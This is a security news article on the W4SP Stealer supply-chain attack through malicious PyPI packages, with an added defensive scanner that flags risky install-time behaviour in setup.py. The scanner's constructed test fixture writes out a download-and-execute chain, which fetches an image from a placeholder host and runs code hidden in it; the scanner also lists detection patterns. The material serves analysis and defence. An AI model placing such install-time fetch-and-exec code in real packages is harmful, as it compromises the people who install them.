
Attackers leverage malicious python packages to spread W4SP Stealer

Obanla Opeyemi

November 29, 2022 - TuxCare expert team

Security researchers from Checkmarx have uncovered an ongoing supply chain attack that involves spreading the malware identified as W4SP Stealer.

W4SP Stealer is a Discord-focused malware that collects Discord accounts, passwords, crypto wallets, credit cards and other data from a victim’s PC and sends them back to the attacker.

W4SP Stealer is currently sold for $20 and interested buyers can pay with crypto or gift cards. The maker of WASP claims it is entirely undetectable and is “protected by some awesome obfuscation.”

The attackers leverage malicious Python packages to distribute the malware; Checkmarx claimed hundreds of users are already victims. Checkmarx’s report therefore buttresses findings from Phylum and Check Point, which flagged 30 different modules published on the Python Package Index (PyPI). These modules were specifically designed to propagate malicious code under the guise of benign-looking packages.

According to researchers at Checkmarx, the threat actor behind the attacks is “WASP.” The attacker uses polymorphic malware, reboot persistence and steganography to hide code inside packages, building a fake GitHub reputation in the process.

Polymorphic code uses a polymorphic engine to mutate while keeping the original algorithm intact. This means the code changes itself every time it runs, although its function remains the same. The technique is used by computer viruses, shellcode and computer worms to hide their presence.

After the malicious package is installed, its setup.py script executes and installs additional Python packages. The setup.py script downloads a .PNG image and saves it in the operating system’s temp directory, then uses the “lsb.reveal” function from the malicious “judyb” package to extract the hidden code from the downloaded image.
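The install-time chain just described (network fetch in setup.py, a file dropped in the temp directory, a steganography helper, then execution of the recovered code) is exactly the kind of behaviour a package reviewer can flag statically before anything runs. The following is an added example of such a triage scanner, not Checkmarx’s tooling or anything from the packages in the report: it parses a setup.py with Python’s `ast` module and reports imports and calls that match each stage. The module and function lists are assumptions chosen for this example, and the two setup.py fixtures are constructed inline (the URL is a placeholder).

```python
"""Static triage of a package's setup.py for install-time indicators.

Added example. Flags the stages the article describes: network download,
temp-directory use, import of a steganography helper (judyb), and
execution of dynamically produced code. Indicator lists are assumptions.
"""
import ast

# Assumed indicator lists for this example, not an authoritative signature set.
NETWORK_MODULES = {"urllib", "requests", "http", "socket"}
STEGO_MODULES = {"judyb"}
TEMP_MODULES = {"tempfile"}
DYNAMIC_EXEC = {"exec", "eval", "compile"}
SHELL_CALLS = {"os.system", "subprocess.run", "subprocess.Popen", "subprocess.call"}


def _dotted(node):
    """Return 'pkg.attr.attr' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _module_category(modname):
    """Map an imported module name to an indicator category, or None."""
    top = modname.split(".")[0]
    if top in NETWORK_MODULES:
        return "network"
    if top in STEGO_MODULES:
        return "stego"
    if top in TEMP_MODULES:
        return "tempdir"
    return None


def scan_setup_py(source):
    """Return findings as 'category:lineno' strings for one setup.py source."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                cat = _module_category(alias.name)
                if cat:
                    findings.append(f"{cat}:{node.lineno}")
        elif isinstance(node, ast.ImportFrom) and node.module:
            cat = _module_category(node.module)
            if cat:
                findings.append(f"{cat}:{node.lineno}")
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in DYNAMIC_EXEC:
                findings.append(f"dynamic-exec:{node.lineno}")
            elif name in SHELL_CALLS:
                findings.append(f"shell:{node.lineno}")
    return findings


def install_time_risk(source):
    """Collapse findings into low/medium/high for a package review queue."""
    cats = {f.split(":")[0] for f in scan_setup_py(source)}
    if "stego" in cats or {"network", "dynamic-exec"} <= cats:
        return "high"  # download-then-execute, or a stego helper at install time
    if cats & {"network", "dynamic-exec", "shell"}:
        return "medium"
    return "low"


# Constructed fixture mirroring the described chain; URL is a placeholder.
SAMPLE_SETUP_PY = '''
from setuptools import setup
import tempfile, os
from urllib.request import urlretrieve
from judyb import lsb

path = os.path.join(tempfile.gettempdir(), "image.png")
urlretrieve("https://example.invalid/image.png", path)
exec(lsb.reveal(path))

setup(name="benign-looking-package", version="0.0.1")
'''

# Constructed fixture for an ordinary package.
BENIGN_SETUP_PY = '''
from setuptools import setup
setup(name="pkg", version="1.0")
'''

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_SETUP_PY), ("benign", BENIGN_SETUP_PY)):
        print(label, install_time_risk(src), scan_setup_py(src))
```

The scanner is deliberately conservative: a lone `tempfile` import is not scored, since legitimate build scripts use it, while a download paired with `exec`, or any import of the steganography helper named in the report, is enough to pull the package out of an automated install path for manual review.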

The sources for this piece include an article in TheHackerNews.
